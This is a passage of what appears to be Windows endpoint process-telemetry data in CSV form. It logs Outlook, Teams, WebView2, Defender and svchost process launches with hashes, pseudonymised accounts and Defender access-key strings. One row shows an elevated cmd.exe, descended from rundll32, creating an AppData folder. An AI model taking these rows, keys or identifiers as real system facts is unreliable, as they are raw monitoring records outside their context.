00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:30:10.441917900+00:00,2021-06-23 01:31:38.229495800+00:00,8167a1b8-d89e-4daa-9aac-bee9443e538a,computerpii_0a470890c60768167990033d701e7bd881398861,158653,False,10.7740.19041.1052,False,11540474045172468,,11540474045172473,2021-06-23 01:30:09.905518700+00:00,13988,2021-06-23 01:30:09.905518700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,13988,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54,2817952,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.258955100+00:00,2021-06-23 01:30:10.010967100+00:00,2021-06-18 23:49:41.395899+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2
+864,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:30:12.756673800+00:00,9660,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_MWI1ZmRiNjctYjhkYS00MDk1LWJhMjItZDRhNjEyNTRhNGUy%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d%22%7d&CT=1624411812130&OR=Outlook-Body&CID=3F0AA69D-CB6B-4978-BB24-0B2D3DDD574A&launchAgent=outlook_protocol_launch""",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:30:12.820641600+00:00,2021-06-23 01:31:38.230038200+00:00,56da5893-c79c-41f1-9af6-1bbe1035eb0b,computerpii_0a470890c60768167990033d701e7bd881398861,158663,False,10.7740.19041.1052,False,11540474045171845,,11540474045172477,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+865,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:30:13.824536100+00:00,15160,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1776,5210420969545014205,4452731299891448321,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1508 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:30:12.756673800+00:00,9660,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_MWI1ZmRiNjctYjhkYS00MDk1LWJhMjItZDRhNjEyNTRhNGUy%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d%22%7d&CT=1624411812130&OR=Outlook-Body&CID=3F0AA69D-CB6B-4978-BB24-0B2D3DDD574A&launchAgent=outlook_protocol_launch""",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:30:13.931378600+00:00,2021-06-23 01:31:38.230139800+00:00,f6540aca-9516-43e6-a749-61c1e9412114,computerpii_0a470890c60768167990033d701e7bd881398861,158665,False,10.7740.19041.1052,False,11540474045172477,,11540474045172479,2021-06-23 01:30:12.756673800+00:00,9660,2021-06-23 01:30:12.756673800+00:00,Teams.exe,9660,256,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+866,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:30:13.342259200+00:00,9920,msedgewebview2.exe,"""msedgewebview2.exe"" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1960,9610365822643270238,18232588942281330170,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware,msAggressiveCacheTrimming,msSingleSignOnOSForPrimaryAccountIsShared,msWindowsTaskManager --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeCouponsDelayNotification,msAutomaticTabFreeze,msBrowserSettingsSupported,msDesktopRewards,msEdgeAddWebCapturetoCollections,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePDFPopUpVisualImproved,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnableMIPForPDF,msEntityExtraction,msExternalTaskManager,msImplicitSignin,msMIPCrossTenantPdfViewSupport,msOpenSaveAsAwarenessUI,msPasswordBreachDetection,msPdfDigitalSignatureRead,msPdfHighlightMode,msPdfInking,msPdfPopupMarkerRenderer,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfVideoComment,msPriceComparison,msReadAloud,msReadAloudPdf,msRevokeExtensions,msScreenShareWebContentEnabled,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msShoppingTrigger,msShowUXForAADPrtSSOForNonAADProfile,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --mojo-platform-channel-handle=4804 /prefetch:8",PortableExecutable,2021-06-18 23:49:41.395899+00:00,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,2817952,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:30:09.905518700+00:00,13988,msedgewebview2.exe,"""msedgewebview2.exe"" --embedded-browser-webview=1 --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --disable-popup-blocking --enable-features=msSingleSignOnOSForPrimaryAccountIsShared --internet-explorer-integration=none --js-flags=""--harmony-weak-refs-with-cleanup-some --expose-gc"" --mojo-named-platform-channel-pipe=16176.7000.9808366599939228438",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:30:15.412487400+00:00,2021-06-23 01:31:38.230292700+00:00,9e9d32cc-c42e-409f-b56a-13c86ea0b753,computerpii_0a470890c60768167990033d701e7bd881398861,158668,False,10.7740.19041.1052,False,11540474045172468,,11540474045172478,2021-06-23 01:30:09.905518700+00:00,13988,2021-06-23 01:30:09.905518700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,13988,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54,2817952,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.258955100+00:00,2021-06-23 01:30:10.010967100+00:00,2021-06-18 23:49:41.395899+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2
+867,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:26:34.524792500+00:00,12844,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 704F33B1-EB3A-67F1-93F1-0EC2EFEC1CF3 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:26:35.385590800+00:00,2021-06-24 08:28:40.117419+00:00,951f3c10-a8bf-4f5c-a008-2b1b7440c072,computerpii_0a470890c60768167990033d701e7bd881398861,177621,True,10.7740.19041.1052,False,11540474045145394,,11540474045177342,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+868,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:54:21.080296900+00:00,2468,svchost.exe,svchost.exe -k netsvcs -p -s wuauserv,PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:54:21.104941800+00:00,2021-06-23 09:55:03.241347700+00:00,2b9d7760-5b46-4e8e-8ad1-07c72de5dcef,computerpii_0a470890c60768167990033d701e7bd881398861,166783,True,10.7740.19041.1052,False,11540474045136906,,11540474045174803,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
+869,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:33:09.273496100+00:00,14284,cmd.exe,"""cmd.exe"" /c ""mkdir C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Microsoft\Resource\""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:31:13.489936600+00:00,12940,cmd.exe,cmd.exe ,True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:33:10.032431+00:00,2021-06-23 03:35:21.984890+00:00,ed6d3399-54f5-443f-9b39-ce22449c04ba,computerpii_0a470890c60768167990033d701e7bd881398861,161925,False,10.7740.19041.1052,False,11540474045173177,,11540474045173194,2021-06-23 03:31:13.489936600+00:00,12940,2021-06-23 03:31:13.489936600+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,12940,18560,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,0.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+870,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:34:46.284409800+00:00,14672,iexplore.exe,"""iexplore.exe"" -startmanager -Embedding",PortableExecutable,2019-12-07 09:51:10.439373900+00:00,C:\Program Files\Internet Explorer\iexplore.exe,819136,6bfe7ca23c89fd5809a48355ec5625ee,f76f00939f1be76152809c37591ef75d3c150745232e35697d99cae09e31c2bc,9ed866e14bb54406c075929183524039ab851a25,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:34:46.325456100+00:00,2021-06-24 02:36:57.204010300+00:00,1bfb3b74-666c-4b92-b372-9dfe6dad0a46,computerpii_0a470890c60768167990033d701e7bd881398861,173454,False,10.7740.19041.1052,False,11540474045136908,,11540474045176035,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,20608.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Internet Explorer,11.00.19041.1,iexplore,IEXPLORE.EXE,Internet Explorer
+871,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:34:46.502421600+00:00,16484,iexplore.exe,"""IEXPLORE.EXE"" SCODEF:14672 CREDAT:9474 /prefetch:2",PortableExecutable,2019-12-07 09:51:10.439373900+00:00,C:\Program Files (x86)\Internet Explorer\iexplore.exe,816072,2e414291458b49acda42c80a4c10de7e,e582676ec900249b408ab4e37976ae8c443635a7da77755daf6f896a172856a3,6bd522a0f1b3f5c11e8e33c5062c45dd6e402113,6bfe7ca23c89fd5809a48355ec5625ee,f76f00939f1be76152809c37591ef75d3c150745232e35697d99cae09e31c2bc,9ed866e14bb54406c075929183524039ab851a25,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 02:34:46.284409800+00:00,14672,iexplore.exe,"""iexplore.exe"" -startmanager -Embedding",False,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:34:46.571641400+00:00,2021-06-24 02:36:57.204372600+00:00,dbaeaa96-3aab-49c2-ac33-f1ca3ba88d30,computerpii_0a470890c60768167990033d701e7bd881398861,173461,False,10.7740.19041.1052,False,11540474045176035,,11540474045176037,2021-06-24 02:34:46.284409800+00:00,14672,2021-06-24 02:34:46.284409800+00:00,\Device\HarddiskVolume3\Program Files\Internet Explorer\iexplore.exe,14672,128,ActiveProcessStartkey,C:\Program Files\Internet Explorer,819136,2040-12-07 02:05:59+00:00,2019-12-06 21:47:00+00:00,2021-06-24 02:34:46.286945900+00:00,2019-12-07 09:51:10.439373900+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,20608.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Internet Explorer,11.00.19041.1,iexplore,IEXPLORE.EXE,Internet Explorer,Microsoft Corporation,Internet Explorer,11.00.19041.1,iexplore,IEXPLORE.EXE,Internet Explorer
+872,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 07:11:09.514928400+00:00,12812,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 0A04C6FE-1DAD-F3BA-0A55-B5B81E988B29 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:11:09.522423500+00:00,2021-06-24 07:12:14.058964400+00:00,cd97e811-5846-40de-b019-e420ba4bf5d8,computerpii_0a470890c60768167990033d701e7bd881398861,176889,False,10.7740.19041.1052,False,11540474045145394,,11540474045177043,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft 